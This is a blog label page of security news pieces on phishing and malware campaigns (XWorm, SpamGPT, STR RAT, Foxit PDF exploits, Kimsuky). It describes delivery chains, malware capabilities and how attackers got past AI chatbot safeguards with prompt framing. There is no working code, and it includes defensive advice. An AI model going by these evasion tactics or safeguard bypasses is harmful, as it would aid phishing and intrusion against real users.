Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Phishing Campaigns. Show all posts
XWorm malware
data theft malware malware Phishing Campaigns ransomware plugins XWorm 6.5 XWorm backdoor XWorm malware

New XWorm Malware Variants Emerge in Phishing Campaigns with Advanced Plugin Capabilities

 

New variants of the XWorm backdoor malware are being actively spread through phishing campaigns after its original creator, known as XCoder, abandoned the project last year.

The latest editions — XWorm 6.0, 6.4, and 6.5 — have been adopted by multiple cybercriminal groups. These updated versions include plugin support that enables a wide range of malicious activities, from data theft and remote system access to file encryption and decryption.

The most recent release developed by XCoder was version 5.6, which contained a remote code execution (RCE) vulnerability. The newly distributed variants reportedly fix that flaw while introducing enhanced attack features.

First detected in 2022, XWorm gained notoriety for its modular structure and broad feature set. It’s primarily used to harvest sensitive data such as passwords, cryptocurrency wallets, and financial information. The malware can also record keystrokes, extract clipboard data, perform DDoS attacks, and deliver other malicious payloads.

After XCoder deleted their Telegram channels, cracked versions of the malware began circulating widely, with various threat actors distributing them. In fact, one campaign even used XWorm itself as bait to target less-experienced hackers—infecting over 18,000 systems globally, primarily across Russia, the U.S., India, Ukraine, and Turkey.

A new version of XWorm appeared on a hacker forum, advertised by a user named XCoderTools, who offered access for a $500 lifetime subscription. Although it’s unclear if this is the same developer, the user claimed that the new versions fixed the RCE issue and introduced multiple updates.

Cybersecurity researchers at Trellix have observed a rise in XWorm samples on VirusTotal since June, suggesting the malware’s increasing popularity among threat actors.

In one campaign, XWorm was distributed using malicious JavaScript that executed a PowerShell script capable of bypassing Microsoft’s Antimalware Scan Interface (AMSI) to install the backdoor.

According to Trellix’s September report, “the XWorm malware infection chain has evolved to include additional techniques beyond traditional email-based attacks.” While .LNK files and email attachments remain common entry points, newer variants disguise themselves as legitimate executables — even mimicking applications like Discord.

“This marks a shift towards combining social engineering with technical attack vectors for greater effectiveness,” Trellix explained.

Further analyses revealed campaigns using AI-themed phishing lures and a modified version of ScreenConnect, as well as cases where malicious Excel files (.XLAM) embedded with shellcode delivered the payload.

Trellix researchers uncovered over 35 plugins associated with the latest XWorm versions, significantly expanding its functions — including a ransomware component.

The Ransomware.dll plugin allows attackers to lock victims’ files, demand payment, and customize ransom notes, wallpaper messages, and Bitcoin wallet details. The encryption avoids system-critical directories, focusing on user folders like %USERPROFILE% and Documents. Encrypted files are appended with the .ENC extension, while a ransom instruction HTML file is dropped on the desktop.

Code analysis revealed similarities between XWorm’s ransomware module and the NoCry ransomware from 2021, both using the same encryption methods (AES-CBC with 4096-byte blocks).

Beyond ransomware, other identified modules include:

  • RemoteDesktop.dll – Enables full remote control sessions.
  • Stealer.dll, Chromium.dll, Recovery.dll – Extract credentials and application data.
  • FileManager.dll – Grants file system access and manipulation.
  • Shell.dll – Executes commands through hidden CMD processes.
  • Webcam.dll – Records or verifies the infected system through webcam access.
  • TCPConnections.dll & ActiveWindows.dll – Send live system and network data to command servers.

With modules designed to steal data from more than 35 browsers, email clients, and crypto wallets, the malware represents a serious risk to both individuals and organizations.

Trellix recommends a multi-layered cybersecurity defense, including EDR solutions for detecting malicious behavior, and email/web gateways to block droppers. Network monitoring tools can also help identify communications with command-and-control (C2) servers and prevent data exfiltration.
Read more »
Phishing Campaigns
AI Cloud Cyber Security GenAI Internet Microsoft Phishing Campaigns

Microsoft Stops Phishing Scam Which Used Gen-AI Codes to Fool Victims


AI: Boon or Curse?

AI code is in use across sectors for variety of tasks, particularly cybersecurity, and both threat actors and security teams have turned to LLMs for supporting their work. 

Security experts use AI to track and address to threats at scale as hackers are experimenting with AI to make phishing traps, create obfuscated codes, and make spoofed malicious payloads. 

Microsoft Threat Intelligence recently found and stopped a phishing campaign that allegedly used AI-generated code to cover payload within an SVG file. 

About the campaign 

The campaign used a small business email account to send self addressed mails with actual victims coveted in BCC fields, and the attachment looked like a PDF but consisted SVG script content. 

The SVG file consisted hidden elements that made it look like an original business dashboard, while a secretly embedded script changed business words into code that exposed a secret payload. Once opened, the file redirects users to a CAPTCHA gate, a standard social engineering tactical that leads to a scanned sign in page used to steal credentials. 

The hidden process combined business words and formulaic code patterns instead of cryptographic techniques. 

Security Copilot studied the file and listed markers in lines with LLM output. These things made the code look fancy on the surface, however, it made the experts think it was AI generated. 

Combating the threat

The experts used AI powered tools in Microsoft Defender for Office 375 to club together hints that were difficult for hackers to push under the rug. 

The AI tool flagged the rare self-addressed email trend , the unusual SVG file hidden as a PDF, the redirecting to a famous phishing site, the covert code within the file, and the detection tactics deployed on the phishing page. 

The incident was contained, and blocked without much effort, mainly targeting US based organizations, Microsoft, however, said that the attack show how threat actors are aggressively toying with AI to make believable tracks and sophisticated payloads.

Read more »
SpamGPT
AI phishing tool Cyber Fraud cybercrime AI email security Phishing Campaigns ransomware attacks SpamGPT

SpamGPT: AI-Powered Phishing Tool Puts Cybersecurity at Risk

 

While most people have heard of ChatGPT, a new threat called SpamGPT is now making headlines. Security researchers at Varonis have discovered that this professional-grade email campaign tool is designed specifically for cybercriminals. The platform, they report, offers “all the conveniences a Fortune 500 marketer might expect, but adapted for cybercrime.”

SpamGPT’s dashboard closely mimics legitimate email marketing software, allowing attackers to plan, schedule, and track large-scale spam and phishing campaigns with minimal effort. By embedding AI-powered features, the tool can craft realistic phishing emails, optimize subject lines, and fine-tune scams—making it accessible even to criminals with little technical background.

"SpamGPT is essentially a CRM for cybercriminals, automating phishing at scale, personalizing attacks with stolen data, and optimizing conversion rates much like a seasoned marketer would. It's also a chilling reminder that threat actors are embracing AI tools just as fast as defenders are," explained Rob Sobers, CMO at Varonis.

The toolkit includes built-in modules for SMTP/IMAP configuration, inbox monitoring, and deliverability testing. Attackers can upload stolen SMTP credentials, verify them through an integrated checker, and rotate multiple servers to avoid detection. IMAP monitoring further allows criminals to track replies, bounces, and email placement.

A real-time inbox check feature sends test emails and confirms whether they land in inboxes or spam folders. Combined with campaign analytics, SpamGPT functions much like a legitimate customer relationship management (CRM) platform—but is weaponized for phishing, ransomware, and other cyberattacks.

Marketed as a “spam-as-a-service” solution, SpamGPT lowers the skill barrier for cybercrime. Tutorials such as “SMTP cracking mastery” guide users in obtaining or hacking servers, while custom header options make it easier to spoof trusted brands or domains. This means even inexperienced attackers can bypass common email authentication methods and run large-scale campaigns.

Experts warn that the rise of SpamGPT could trigger a surge in phishing, ransomware, and malware attacks. Its ability to slip past spam filters and disguise malicious payloads as legitimate correspondence makes it especially dangerous for both individuals and businesses.

To counter threats like SpamGPT, cybersecurity experts recommend:

  • Enforcing DMARC, SPF, and DKIM to block spoofed emails.

  • Deploying AI-driven phishing detection tools.

  • Maintaining regular backups and malware removal protocols.

  • Implementing multi-factor authentication (MFA) across all accounts.

  • Providing ongoing phishing awareness training for employees.

  • Using network segmentation and least-privilege access controls.

  • Keeping software and security patches updated.

  • Testing and refining incident response plans for rapid recovery.

SpamGPT demonstrates how cybercriminals are harnessing AI to evolve their tactics. As defenses improve, attackers are adapting just as quickly—making vigilance and layered security strategies more critical than ever.

Read more »
State-Sponsored Espionage
AI Misuse Cybersecurity Data Theft Deepfake Attacks Generative AI Kimsuky malware North Korean Hackers Phishing Campaigns State-Sponsored Espionage

North Korean Threat Actors Leverage ChatGPT in Deepfake Identity Scheme


North Korean hackers Kimsuky are using ChatGPT to create convincing deepfake South Korean military identification cards in a troubling instance of how artificial intelligence can be weaponised in state-backed cyber warfare, indicating that artificial intelligence is becoming increasingly useful in cyber warfare. 

As part of their cyber-espionage campaign, the group used falsified documents embedded in phishing emails targeting defence institutions and individuals, adding an additional layer of credibility to their espionage activities. 

A series of attacks aimed at deceiving recipients, delivering malicious software, and exfiltrating sensitive data were made more effective by the use of AI-generated IDs. Security monitors have categorised this incident as an AI-related hazard, indicating that by using ChatGPT for the wrong purpose, the breach of confidential information and the violation of personal rights directly caused harm. 

Using generative AI is becoming increasingly common in sophisticated state-sponsored operations. The case highlights the growing concerns about the use of generative AI in sophisticated operations. As a result of the combination of deepfake technology and phishing tactics, these attacks are harder to detect and much more damaging. 

Palo Alto Networks' Unit 42 has observed a disturbing increase in the use of real-time deepfakes for job interviews, in which candidates disguise their true identities from potential employers using this technology. In their view, the deepfake tactic is alarmingly accessible because it can be done in a matter of hours, with just minimal technical know-how, and with inexpensive consumer-grade hardware, so it is alarmingly accessible and easy to implement. 

The investigation was prompted by a report that was published in the Pragmatic Engineer newsletter that described how two fake applicants who were almost hired by a Polish artificial intelligence company raised suspicions that the candidates were being controlled by the same individual as deepfake personas. 

As a result of Unit 42’s analysis, these practices represent a logical progression from a long-standing North Korean cyber threat scheme, one in which North Korean IT operatives attempt to infiltrate organisations under false pretences, a strategy well documented in previous cyber threat reports. 

It has been repeatedly alleged that the hacking group known as Kimsuky, which operated under the direction of the North Korean state, was involved in espionage operations against South Korean targets for many years. In a 2020 advisory issued by the U.S. Department of Homeland Security, it was suggested that this group might be responsible for obtaining global intelligence on Pyongyang's behalf. 

Recent research from a South Korean security firm called Genians illustrates how artificial intelligence is increasingly augmented into such operations. There was a report published in July about North Korean actors manipulating ChatGPT to create fake ID cards, while further experiments revealed that simple prompt adjustments could be made to override the platform's built-in limitations by North Korean actors. 

 It follows a pattern that a lot of people have experienced in the past: Anthropic disclosed in August that its Claude Code software was misused by North Korean operatives to create sophisticated fake personas, pass coding assessments, and secure remote positions at multinational companies. 

In February, OpenAI confirmed that it had suspended accounts tied to North Korea for generating fraudulent resumes, cover letters, and social media content intended to assist with recruitment efforts. These activities, according to Genians director Mun Chong-hyun, highlight the growing role AI has in the development and execution of cyber operations at many stages, from the creation of attack scenarios, the development of malware, as well as the impersonation of recruiters and targets. 

A phishing campaign impersonating an official South Korean military account (.mil.kr) has been launched in an attempt to compromise journalists, researchers, and human rights activists within this latest campaign. To date, it has been unclear how extensive the breach was or to what extent the hackers prevented it. 

Officially, the United States assert that such cyber activities are a part of a larger North Korea strategy, along with cryptocurrency theft and IT contracting schemes, that seeks to provide intelligence as well as generate revenue to circumvent sanctions and fund the nuclear weapons program of the country. 

According to Washington and its allies, Kimsuky, also known as APT43, a North Korean state-backed cyber unit that is suspected of being responsible for the July campaign, was already sanctioned by Washington and its allies for its role in promoting Pyongyang's foreign policy and sanction evasion. 

It was reported by researchers at South Korean cybersecurity firm Genians that the group used ChatGPT to create samples of government and military identification cards, which they then incorporated into phishing emails disguised as official correspondence from a South Korean defense agency that managed ID services, which was then used as phishing emails. 

Besides delivering a fraudulent ID card with these messages, they also delivered malware designed to steal data as well as allow remote access to compromised systems. It has been confirmed by data analysis that these counterfeit IDs were created using ChatGPT, despite the tool's safeguards against replicating government documents, indicating that the attackers misinterpreted the prompts by presenting them as mock-up designs. 

There is no doubt that Kimsuky has introduced deepfake technology into its operations in such a way that this is a clear indication that this is a significant step toward making convincing forgeries easier by using generative AI, which significantly lowers the barrier to creating them. 

It is known that Kimsuky has been active since at least 2012, with a focus on government officials, academics, think tanks, journalists, and activists in South Korea, Japan, the United States, Europe, and Russia, as well as those affected by North Korea's policy and human rights issues. 

As research has shown, the regime is highly reliant on artificial intelligence to create fake summaries and online personas. This enables North Korean IT operatives to secure overseas employment as well as perform technical tasks once they are embedded. There is no doubt that such operatives are using a variety of deceptive practices to obscure their origins and evade detection, including artificial intelligence-powered identity fabrication and collaboration with foreign intermediaries. 

The South Korean foreign ministry has endorsed that claim. It is becoming more and more evident that generative AI is increasingly being used in cyber-espionage, which poses a major challenge for global cybersecurity frameworks: assisting citizens in identifying and protecting themselves against threats not solely based on technical sophistication but based on trust. 

Although platforms like ChatGPT and other large language models may have guardrails in place to protect them from attacks, experts warn that adversaries will continue to seek out weaknesses in the systems and adapt their tactics through prompt manipulation, social engineering, and deepfake augmentation in an effort to defeat the system. 

Kimsuky is an excellent example of how disruptive technologies such as artificial intelligence and cybercrime erode traditional detection methods, as counterfeit identities, forged credentials, and distorted personas blur the line between legitimate interaction and malicious deception, as a result of artificial intelligence and cybercrime. 

The security experts are urging the public to take action by using a multi-layered approach that combines AI-driven detection tools, robust digital identity verification, cross-border intelligence sharing, and better awareness within targeted sectors such as defence, academia, and human rights industries. 

Developing AI technologies together with governments and private enterprises will be critical to ensuring they are harnessed responsibly while minimising misuse of these technologies. It is clear from this campaign that as adversaries continue to use artificial intelligence to sharpen their attacks, defenders must adapt just as fast to maintain trust, privacy, and global security as they do against adversaries.
Read more »
SharePoint
Credential Theft Cyber Fraud Cyber Threats Microsoft 365 login Microsoft visio Phishing Attack Phishing Campaigns SharePoint

New Two-Step Phishing Attack Exploits Microsoft Visio and SharePoint

 

A novel two-step phishing strategy is targeting Microsoft Visio files (.vsdx) and SharePoint, signaling a new trend in cyber deception, according to experts. Researchers at Perception Point have noted a significant rise in attacks leveraging these previously uncommon .vsdx files.

These files act as delivery tools, directing victims to phishing pages that replicate Microsoft 365 login portals, aiming to steal user credentials.

The two-step phishing attacks employ layered techniques to evade detection. Rather than delivering harmful content directly, these campaigns use trusted platforms like Microsoft SharePoint to host files that appear legitimate. Attackers embed URLs within Visio files, which redirect victims to malicious websites when clicked, bypassing traditional email security systems.

Microsoft Visio, a popular tool for professional diagram creation, has now become a phishing vector. Cybercriminals send emails with Visio files from compromised accounts, often mimicking urgent business communications such as proposals or purchase orders. This tactic encourages recipients to act quickly, increasing the likelihood of success.

Since the emails come from stolen accounts, they often pass authentication checks and evade recipient security filters. In some cases, attackers include .eml files within the emails, embedding additional malicious URLs linked to SharePoint-hosted files.

The Visio files typically contain a clickable button labeled "View Document." Victims are instructed to press the Ctrl key while clicking the button to access the malicious URL. This step, requiring manual interaction, bypasses automated security systems that cannot simulate such behaviors.

Perception Point advises organizations to strengthen their defenses against sophisticated phishing campaigns by adopting advanced threat detection solutions. Suggested measures include:

  • Dynamic URL analysis to identify harmful links.
  • Object detection models to flag suspicious files.
  • Enhanced authentication mechanisms to reduce the impact of compromised accounts.
Read more »
STR RAT
Credential Theft cybersecurity threat Java Malware keylogging Malicious Payloads malware Phishing Campaigns Remote Access Trojan STR RAT

STR RAT: A Persistent Remote Access Trojan

 

The STR RAT is a remote access trojan (RAT) written in Java, first detected in 2020. Like other RATs, it allows threat actors full control of an infected machine. STR RAT is capable of keylogging, credential theft, and deploying additional malicious payloads. 

The malware is updated annually, aligning with its renewed use by threat actors. Cofense's analysis from January 2023 to April 2024 reveals that 60% of STR RAT samples are delivered directly via email rather than embedded links.

History of STR RAT

STR RAT resembles a seasonal flu, with yearly updates making it more prominent for short periods. Initially discovered on an antivirus forum in 2020, version 1.2 already featured keylogging, password theft, and backdoor access, along with a fake “.crimson” ransomware module that only renamed files. In 2021, Microsoft Threat Intelligence highlighted STR RAT in phishing campaigns. By 2022, it spoofed the Maersk shipping brand and employed a polyglot file technique, allowing execution as an MSI or Java file. In 2023, version 1.6 used Zelix KlassMaster and Allatori for code obfuscation. In 2024, STR RAT was uploaded to legitimate services like GitHub and AWS, making it harder to detect.

STR RAT steals passwords from Chrome, Firefox, Internet Explorer, and email clients like Outlook, Thunderbird, and Foxmail. Key commands include o-keylogger for logging keystrokes, down-n-exec for file execution, remote-screen for commandeering the computer, and power-shell for PowerShell access.

Current Usage and Impact

Though not as prevalent as other RATs like Remcos, STR RAT showed sustained activity from March to August 2023, likely due to the new version and polyglot file technique. In March 2024, significant activity was noted again, attributed to the use of legitimate services like GitHub and AWS for hosting and delivering the malware. STR RAT is typically delivered via email as an archive containing a .jar file, requiring a Java Runtime Environment (JRE) to execute. These archives may also contain necessary JRE binaries or download them from Maven and GitHub repositories.

Delivery Mechanisms

STR RAT's second most common delivery mechanism is loaders, which reach out to a payload location to download and run the malware. Jar Downloaders, CVE-2017-11882 exploits in Microsoft Office, and Windows Registry File downloaders are commonly used loaders. Additionally, embedded URLs in emails or attached PDFs often lead to the malware hosted on legitimate services like AWS, GitHub, and Discord’s CDN.

Unlike loaders, droppers contain the malware to be deployed. STR RAT's most common dropper is the JavaScript Dropper (JS Dropper), a .js file that executes natively on Windows. JS Droppers are usually attached to emails and contain both the dropper and STR RAT.

Behavior and Capabilities

Upon execution, STR RAT places files, creates persistence, and installs dependencies. It uses geolocator services to geo-fingerprint infected computers and sends system information to its command-and-control (C2) server. The malware also uses legitimate Java libraries for keylogging and database connectivity.

Detection and Hunting

Different versions of STR RAT leave various indicators of compromise (IOCs). After execution, STR RAT copies itself to multiple locations, creates a \lib\ folder with legitimate files, and generates a XXXXlock.file in the user's local home profile. The configuration can be observed through memory analysis, revealing the C2 server, port, and domain.

Persistence

STR RAT can create persistence through Registry Run Keys, Startup Folder entries, or Scheduled Tasks, ensuring the malware runs every time the user logs in. Endpoint detection and response software can monitor specific locations for signs of STR RAT persistence.

Network Traffic

STR RAT communicates with C2 servers using subdomains of free dynamic DNS services and legitimate services like GitHub and Maven. HTTP is used for C2 communications, though the port is not the standard tcp/80.

Legitimate Services

STR RAT reaches out to legitimate services for hosting tools and malware. Indicators of suspicious activity include access to GitHub and Maven repositories in conjunction with other malicious behaviors.

By understanding STR RAT's history, capabilities, and delivery mechanisms, cybersecurity professionals can better detect and defend against this persistent threat.
Read more »
Phishing Campaigns
Check Point research Cyber Attacks Foxit PDF Reader malware malicious PDF files malware malware delivery PDF Phishing Campaigns

How Attackers Distribute Malware to Foxit PDF Reader Users

 

Threat actors are exploiting a vulnerability in Foxit PDF Reader’s alert system to deliver malware through booby-trapped PDF documents, according to researchers at Check Point.

The researchers have identified several campaigns targeting Foxit Reader users with malicious PDF files. Attackers are utilizing various .NET and Python exploit builders, notably the “PDF Exploit Builder,” to create PDF documents containing macros that execute commands or scripts. These commands download and run malware such as Agent Tesla, Remcos RAT, Xworm, and NanoCore RAT.

"Regardless of the programming language, all builders exhibit a consistent structure. The PDF template used for the exploit includes placeholder text, which is meant to be replaced with the URL for downloading the malicious file once the user provides input," explained the researchers.

Additionally, threat actors are exploiting the fact that some of the pop-up alerts in Foxit Reader make the harmful option the default choice when opening these compromised files.

The first pop-up alert warns users that certain features are disabled to avoid potential security risks, giving them the option to trust the document one time only or always. The default and safer option is the former. However, once the user clicks OK, another alert appears.

Attackers are banking on users ignoring the alert text and quickly accepting the default options, thereby allowing Foxit Reader to execute the malicious command.

Foxit PDF Reader, used by over 700 million people globally, including in government and tech sectors, has been exploited by various threat actors ranging from e-crime to APT groups. These groups have been leveraging this exploit for years, often evading detection by most antivirus software and sandboxes that primarily focus on Adobe PDF Reader.

"The infection success and low detection rate have enabled PDFs to be distributed through unconventional means, such as Facebook, without being intercepted by detection rules," the researchers noted.

Check Point has reported the exploit to Foxit, and the company has announced plans to address it in version 2024 3.

"The proper approach would be to detect and disable such CMD executions. However, based on Foxit's response, they might simply change the default options to 'Do Not Open'," said Antonis Terefos, a reverse engineer at Check Point Research, to Help Net Security.

Efforts to reach Foxit for further comments have yet to receive a response.
Read more »
Phishing Campaigns
Azure Phishing Attacks Phishing Campaigns

Phishing and Cloud Account Takeover Campaign Targeting Microsoft Azure Users

 


In a security breach, several Azure accounts were compromised, which resulted in the loss of important data from the users. A cyberattack was launched against senior executives in several major corporations and affected a variety of environments at the same time. 

In November 2023, Proofpoint, a cybersecurity company, discovered a harmful attack by combining cloud account takeover (ATO) with phishing techniques that would steal credentials from the victim. This attack used the same harmful campaign that was discovered by Proofpoint in November 2023. 

It is alleged that the hackers have used proxy services to get around geographical limitations and conceal their actual location, which would allow them to access both Office Home and Microsoft 365 applications at the same time. It is thought that the attackers used links in the papers that led to phishing websites to execute the attack. 

The anchor text for some of these links was “View document,” which made no sense to me as it did not imply anything about their real location. There was a well-planned attack that targeted both mid-level employees and senior employees, though a greater number of the former employees' accounts were hacked as a result. 

According to Proofpoint, CEOs, presidents, account managers, finance directors, vice presidents of operations, and sales directors were the most common targets. In this way, the attackers were able to gain access to information from all levels and domains of the organization. 

A cybercriminal will often use their own MFA (multifactor authentication) in these types of attacks to extend access to an account that has been compromised by the attackers. To prevent the user from regaining access, attackers add a second mobile number or set up an authentication app. To conceal their traces, attackers also destroy any evidence that suggests questionable behaviour. 

The most targeted positions were mid to senior-level, including sales directors, account managers, financial directors, operations vice presidents, and CEOs, among others. The attackers were able to gain access to a wide variety of organizational information as a result of this. 

As a result, the attackers have also instituted methods to maintain access, such as setting up a multi-factor authentication system and erasing all evidence of their intrusion. Data theft and financial fraud appear to be the primary goals of these attacks. 

It is not yet confirmed who the perpetrators are, although the evidence suggests that they will be located in Russia or Nigeria, and will use ISPs that are located in these countries.
Read more »
Subscribe to: Comments (Atom)